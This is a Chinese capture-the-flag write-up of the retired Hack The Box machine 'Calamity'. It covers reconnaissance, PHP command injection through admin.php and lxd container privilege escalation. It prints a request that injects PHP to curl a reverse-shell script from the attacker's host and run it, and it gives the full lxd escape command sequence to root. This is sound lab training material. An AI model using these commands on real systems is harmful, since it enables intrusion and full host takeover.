HTB-靶机-Calamity

♀尐吖头ヾ 提交于 2020-12-04 18:31:12

本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.27

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令

autorecon 10.10.10.27 -o ./calamity-autorecon

最终的扫描结果

得知开放两个端口,先访问80端口

没发现啥有价值的信息,看下上面程序跑的目录情况

发现200响应码 有最下面几个,访问了,确认admin.php看似是可以利用的

上面试了试admin/admin弱口令并未成功,然后看下burpsuite抓包情况

发现密码,使用此密码以用户admin进行登录

登录成功之后,显示上述信息,根据上述信息的提示可以是使用php进行命令执行,试了试还真可以

那么可以执行命令那么就反弹shell,这里开始使用nc,发现成功反弹之后又被踢出去了,后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致,所以我这直接使用curl命令下载php反弹shell然后执行成功反弹,下面是反弹shell请求包

GET /admin.php?html=%3C%3Fphp+system%28('curl+http://10.10.14.4:8000/rev.php+|php')%29%3F%3E HTTP/1.1
Host:
10.10.10.27
User
-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text
/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept
-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept
-Encoding: gzip, deflate
DNT:
1
Referer: http:
//10.10.10.27/admin.php
Cookie: adminpowa
=noonecares
Connection: close

下载枚举脚本枚举可用的提权信息,没发现啥有价值的信息,看了下目标普通用户的家目录,发现如下信息

有些音频文件,将其传到本地kali使用工具导入合并多听几遍得出密码为18547936..* 对应登录ssh用户xalvas

成功登陆目标靶机用户xalvas,执行id命令发现含有lxd,可以通过lxd进行提权,相关参考:

https://reboare.github.io/lxd/lxd-escape.html

具体整个的提权命令如下:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd
-alpine-builder/
sudo .
/build-alpine -a i686
wget http:
//10.10.14.4:8000/alpine-v3.12-x86_64-20201103_0108.tar.gz
lxc image
import alpine-v3.12-i686-20201110_2252.tar.gz --alias bmfx
lxc image list
lxc init bmfx privesc
-c security.privileged=true
lxc list
lxc config device add privesc host
-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc
exec privesc --mode=interactive /bin/sh
cat
/mnt/root/root/root.txt


本文分享自微信公众号 - 白帽安全技术复现(baimaofuxian)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!